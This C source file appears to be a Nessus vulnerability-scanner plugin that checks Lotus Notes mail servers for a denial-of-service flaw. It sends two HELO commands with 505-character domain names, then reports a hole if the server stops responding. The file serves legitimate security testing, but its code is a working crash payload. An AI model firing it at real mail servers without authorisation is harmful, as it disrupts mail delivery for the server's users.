/* 
 * Notes MTA dos
 * 
 * This plugin was written by Renaud Deraison 
 * and is being distributed under the GPL
 * 
 * Modified by Alain Thivillon <Alain.Thivillon@hsc.fr>
 */

#include <includes.h>


#define NAME "Lotus Notes MTA dos"
#define DESC "\
It is possible to crash the Lotus Notes\n\
MTA by sending it two HELO commands with long domain names, both\n\
on the Solaris and Windows platform.\n\
An attacker can prevent the incoming mail \n\
from being delivered.\n\
Risk factor : Medium/High"

#define COPYRIGHT "found by Siva Sankar Adiraju <adirajus@HOTMAIL.COM>"
#define SUMM "makes the Lotus MTA crash"


PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
  plug_set_name(desc, NAME);
  plug_set_description(desc, DESC);
  plug_set_summary(desc, SUMM);
  plug_set_copyright(desc, COPYRIGHT);
  plug_set_category(desc, ACT_DENIAL);
  plug_set_family(desc, "Denial of Service");
  plug_set_dep(desc, "find_service.nes");
  return(0);
}



PlugExport int plugin_run(struct arglist * env);
PlugExport int plugin_run(struct arglist * env)
{
      int soc;
      int port = (int)plug_get_key(env, "Services/smtp");
      if(!port)port = 25;
      if(!host_get_port_state(env, port))return(0);
      soc = open_sock_tcp(env, port);
      if(soc < 0)return(0);
      else
      { 
       char * buffer;
       int index;
       int crashdone=0;

       buffer = emalloc(2048);
       recv(soc, buffer, 255,0);
       if(strncmp(buffer, "220", 3)){
       	efree(&buffer);return(0);}
       sprintf(buffer, "HELO ");
       for (index=5;index<510;index++) *(buffer+index)='a';
       *(buffer+510)='\n';
       *(buffer+511)=0;
       send(soc, buffer, strlen(buffer), 0);
       recv(soc, buffer, 2048, 0);
       if(strncmp(buffer, "250", 3)){
        efree(&buffer);return(0);}
       sprintf(buffer, "HELO ");
       for (index=5;index<510;index++) *(buffer+index)='b';
       *(buffer+510)='\n';
       *(buffer+511)=0;
       send(soc, buffer, strlen(buffer),0);
       shutdown(soc, 2);
       sleep(10);
       soc = open_sock_tcp(env, 25);
       if (soc>=0) {
         fd_set readfs;
         struct timeval tmo;
        
         /* Try to read a response from server */

         FD_ZERO(&readfs);
         FD_SET(soc,&readfs);
         tmo.tv_sec=20;
         tmo.tv_usec=0;
         crashdone=(select(soc+1,&readfs,NULL,NULL,&tmo)<=0);
       }
       crashdone=crashdone||(soc<0);
       if(crashdone)
       {
        post_hole(env, port, "\
It was possible to crash the remote\n\
MTA by sending it two HELO commands\n\
with different long domain names.\n\
Solution : contact your vendor for a patch");
       }
       if (soc>0)
       {
        shutdown(soc, 2);
        close(soc);
       }
      }
 return(0);
}
